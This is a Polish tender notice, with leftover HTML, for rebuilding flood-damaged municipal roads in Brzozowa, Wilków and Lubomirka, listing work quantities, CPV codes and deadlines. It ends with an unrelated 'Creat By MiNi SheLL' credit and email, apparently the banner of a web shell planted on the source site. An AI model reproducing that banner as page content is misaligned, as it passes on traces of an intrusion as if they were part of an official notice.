Odbudowa  drogi gminnej zlokalizowanej na działce o numerze ewidencyjnym 56 od km 0+000 do km 0+247 w miejscowości  Brzozowa, zniszczonej w wyniku powodzi w 2010r.
Zakres prac obejmuje:
1. Roboty pomiarowe przy robotach drogowych dla trasy drogowej w terenie równinnym 
= 0,247km.
2. Koryta wykonywane mechanicznie głębokości  20 cm w gruncie kategorii II-VI na całej szer. jezdni - z wywozem ziemi w ilości 195,65m3 na odległość 1,0km = 834,49m2.
3. Umocnienie podłoża gruntowego geowłókniną 400 = 834,49m2.
4. Warstwy odsączające zagęszczane mechanicznie o grubości  10 cm  =  834,49m2.
5. Podbudowa z kruszywa łamanego stabilizowanego mechanicznie grubości  15cm 
= 791,09m2.
6. Oczyszczenie i skropienie - warstwy bitumiczne = 747,69m2.
7. Nawierzchnia gruntowa naturalna - pobocza  =  204,99m2.
8. Nawierzchnia z mieszanek mineralno - asfaltowych, warstwa wiążąca z AC11W grubość po zagęszczeniu 4 cm  =  747,69m2.
9. Nawierzchnia z mieszanek mineralno - asfaltowych, warstwa ścieralna z AC8S grubość po zagęszczeniu 4 cm = 722,99m2.
10. Tarcze znaków - średnie = 5szt.
11.  Tarcze znaków - grupa T  =  4szt.
12. Słupki do znaków = 5szt.
13.  Rura osłonowa na kabel teletechniczny  =  5mb..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.00.00-1, 45.23.30.00-9, 45.23.31.00-0, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Odbudowa dróg gminnych zniszczonych w trakcie powodzi w 2010r.
Zadanie nr 3.
Odbudowa drogi gminnej w m. Wilków na odcinku 471,50mb
W tym:
3.1.  Odbudowa  drogi gminnej zlokalizowanej na działce o numerze ewidencyjnym 693 od km 0+000 do km 0+468,50 w miejscowości  Wilków/ etap II -  nawierzchnia/ , zniszczonej w wyniku powodzi w 2010r.
3.2. Włączenie do drogi powiatowej na odcinku 3,00 mb..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3.
Odbudowa drogi gminnej w m. Wilków na odcinku 471,50mb
W tym:
3.1.  Odbudowa  drogi gminnej zlokalizowanej na działce o numerze ewidencyjnym 693 od km 0+000 do km 0+468,50 w miejscowości  Wilków/ etap II -  nawierzchnia/ , zniszczonej w wyniku powodzi w 2010r.
Zakres prac obejmuje:
1. Roboty pomiarowe przy robotach drogowych dla trasy drogowej w terenie równinnym
 = 0,4685km.
2. Profilowanie istniejącej podbudowy żużlowej wraz z zagęszczeniem = 1499,20m2.
3. Podbudowa z kruszywa łamanego stabilizowanego mechanicznie grubości  8cm 
= 1499,20m2.
4. Oczyszczenie i skropienie - warstwy bitumiczne = 1499,20m2.
5. Nawierzchnia gruntowa naturalna - pobocza grubości 15cm = 468,50m2.
6. Nawierzchnia z mieszanek mineralno - asfaltowych, warstwa wiążąca z AC11W grubość po zagęszczeniu   4 cm = 1452,35m2.
7. Nawierzchnia z mieszanek mineralno - asfaltowych, warstwa ścieralna z AC8S grubość po zagęszczeniu   4 cm  =  1405,50m2.
3.2. Włączenie do drogi powiatowej na odcinku 3,00 mb.
1. Roboty pomiarowe przy robotach drogowych dla trasy drogowej w terenie równinnym 
= 0,003km.
2. Profilowanie istniejącej podbudowy żużlowej wraz z zagęszczeniem = 22,87m2.
3. Podbudowa z kruszywa łamanego stabilizowanego mechanicznie grubości  8cm =22,87m2.
4. Oczyszczenie i skropienie - warstwy bitumiczne = 22,87m2.
5. Nawierzchnia gruntowa naturalna - pobocza grubości 15cm = 10,48m2.
6. Nawierzchnia z mieszanek mineralno - asfaltowych, warstwa wiążąca z AC11W grubość po zagęszczeniu  4 cm = 22,34m2.
7. Nawierzchnia z mieszanek mineralno - asfaltowych, warstwa ścieralna z AC8S grubość po zagęszczeniu  4 cm  =  21,80m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.00.00-1, 45.23.30.00-9, 45.23.31.00-0, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Odbudowa dróg gminnych zniszczonych w trakcie powodzi w 2010r.
Zadanie nr 4.
Odbudowa  drogi gminnej zlokalizowanej na działce o numerze ewidencyjnym 158 od km 0+000 do km 0+660 w miejscowości  Lubomirka , zniszczonej w wyniku powodzi w 2010r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4.
Odbudowa  drogi gminnej zlokalizowanej na działce o numerze ewidencyjnym 158 od km 0+000 do km 0+660 w miejscowości  Lubomirka , zniszczonej w wyniku powodzi w 2010r.
Zakres prac obejmuje:
1. Roboty pomiarowe przy robotach drogowych dla trasy drogowej w terenie równinnym
 = 0,660km.
2. Wykonanie wykopu w gruntach kategorii  I-II wraz z wywozem ziemi na odległość 1,0km  = 132,00m3.
3. Koryta wykonywane mechanicznie głębokości  20 cm w gruncie kategorii  II-VI na całej szerokości jezdni  - z wywozem ziemi na odległość 1,0km = 1320m2.
4. Umocnienie podłoża gruntowego geowłókniną  400 = 1320m2.
5. Warstwy odsączające zagęszczane mechanicznie o grubości 10 cm = 1320m2.
6. Warstwy podbudowy z żużla stalowniczego 31,5 - 63 zagęszczane mechanicznie o grubości 10 cm - warstwa dolna = 1320m2.
7. Warstwy podbudowy z żużla stalowniczego  0-12 zagęszczane mechanicznie o grubości  10 cm - warstwa górna  = 1320m2.
8. Tarcze znaków - średnie  =  3szt.
9. Słupki do znaków =  3szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.00.00-1, 45.23.30.00-9, 45.23.31.00-0, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com